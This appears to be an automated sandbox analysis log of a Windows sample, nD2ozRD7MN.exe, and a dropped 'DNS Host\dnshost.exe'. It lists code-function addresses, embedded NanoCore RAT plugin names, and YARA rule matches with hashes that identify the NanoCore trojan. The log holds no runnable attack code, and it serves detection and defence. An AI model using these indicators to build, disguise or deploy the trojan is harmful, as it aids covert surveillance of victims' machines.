Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 5_2_078E3CCE	5_2_078E3CCE
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 5_2_078E9BC8	5_2_078E9BC8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 5_2_078E6906	5_2_078E6906
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_009F3E34	9_2_009F3E34
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_009FE04C	9_2_009FE04C
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_025A2F00	9_2_025A2F00
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_025A05B8	9_2_025A05B8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_0596AEF8	9_2_0596AEF8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059621B0	9_2_059621B0
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_0596B6B8	9_2_0596B6B8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059623F0	9_2_059623F0
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059B1078	9_2_059B1078
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059B2348	9_2_059B2348
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059BD428	9_2_059BD428
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059B5610	9_2_059B5610
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059B5602	9_2_059B5602
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059B4600	9_2_059B4600
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059BC188	9_2_059BC188
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059BE128	9_2_059BE128
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059BC179	9_2_059BC179
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059B1069	9_2_059B1069
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059B2338	9_2_059B2338
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059BBD38	9_2_059BBD38
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059BDCEF	9_2_059BDCEF
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059B5897	9_2_059B5897
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_059B58A8	9_2_059B58A8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_072E2106	9_2_072E2106
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_072ECD54	9_2_072ECD54
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_072E6CE8	9_2_072E6CE8
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_072E2C38	9_2_072E2C38
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 9_2_072E8C00	9_2_072E8C00
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Code function: 12_2_011BD344	12_2_011BD344
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_016E3E34	15_2_016E3E34
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_016EE04C	15_2_016EE04C
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_016E7040	15_2_016E7040
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_030B0120	15_2_030B0120
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_030B0130	15_2_030B0130
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_073521B0	15_2_073521B0
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_0735AEF8	15_2_0735AEF8
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_0735B6B8	15_2_0735B6B8
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_073523F0	15_2_073523F0
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_07372338	15_2_07372338
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_07371069	15_2_07371069
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_07375610	15_2_07375610
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_07375602	15_2_07375602
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_073745F0	15_2_073745F0
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_0737D428	15_2_0737D428
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_0737E128	15_2_0737E128
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_0737C179	15_2_0737C179
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_0737C188	15_2_0737C188
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_0737BD38	15_2_0737BD38
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_0737DCEF	15_2_0737DCEF
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_07375858	15_2_07375858
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_073758A8	15_2_073758A8
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_07375897	15_2_07375897
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_073EE7E0	15_2_073EE7E0
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_073E2106	15_2_073E2106
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_073E6CE8	15_2_073E6CE8
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_073E2C38	15_2_073E2C38
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_073E8C00	15_2_073E8C00
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_07D105B8	15_2_07D105B8
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 15_2_07D13030	15_2_07D13030
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 17_2_0130D344	17_2_0130D344
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_00E93E34	19_2_00E93E34
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_00E9E04C	19_2_00E9E04C
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_00E9703A	19_2_00E9703A
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_00F21BC8	19_2_00F21BC8
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_00F22D60	19_2_00F22D60
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BCAEF8	19_2_06BCAEF8
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BC21B0	19_2_06BC21B0
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BCB6B8	19_2_06BCB6B8
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BC7289	19_2_06BC7289
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BC7210	19_2_06BC7210
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BC23F0	19_2_06BC23F0
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BE2338	19_2_06BE2338
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BE1069	19_2_06BE1069
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BE5610	19_2_06BE5610
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BE5602	19_2_06BE5602
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BED428	19_2_06BED428
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BE45F0	19_2_06BE45F0
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BEC188	19_2_06BEC188
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BEE138	19_2_06BEE138
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BEBD38	19_2_06BEBD38
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BEDD00	19_2_06BEDD00
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BE58A8	19_2_06BE58A8
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BE5897	19_2_06BE5897
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BF2106	19_2_06BF2106
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BF6CE8	19_2_06BF6CE8
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BFCD54	19_2_06BFCD54
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BF6CD8	19_2_06BF6CD8
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BF2C38	19_2_06BF2C38
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_06BF8C00	19_2_06BF8C00
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_070427A8	19_2_070427A8
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_0704E7F0	19_2_0704E7F0
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_07042798	19_2_07042798
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_0704CE20	19_2_0704CE20
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 19_2_0704CE30	19_2_0704CE30
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Code function: 20_2_02ECD344	20_2_02ECD344

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1960

Source: nD2ozRD7MN.exe, 00000000.00000002.2037006043.0000000007EA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000000.00000000.1999328550.0000000000B2E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUFVz.exe6 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000000.00000002.2013527422.000000000117E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFileBrowserClient.dllT vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPluginNew.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3558552439.00000000078F8000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3536908593.00000000015E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000045E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000045E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000045E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNAudio.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000045E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCoreClientPlugin.dll8 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3554404587.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNAudio.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3558638769.0000000007928000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3558861975.000000000793E000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCoreClientPlugin.dll8 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreBase.dll< vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPluginNew.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFileBrowserClient.dllT vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.0000000004431000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNAudio.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreBase.dll< vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3558267406.00000000078CE000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000009.00000002.2062497793.0000000004305000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 00000009.00000002.2062497793.000000000437A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe, 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs nD2ozRD7MN.exe
Source: nD2ozRD7MN.exe	Binary or memory string: OriginalFilenameUFVz.exe6 vs nD2ozRD7MN.exe

Source: nD2ozRD7MN.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5.2.nD2ozRD7MN.exe.474e28e.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.474e28e.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.474e28e.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.7880000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.7880000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.7880000.20.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.7870000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.7870000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.7870000.19.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.78a0000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.78a0000.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.78a0000.22.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.78c0000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.78c0000.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.78c0000.23.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.76e0000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.76e0000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.76e0000.16.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.7930000.28.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
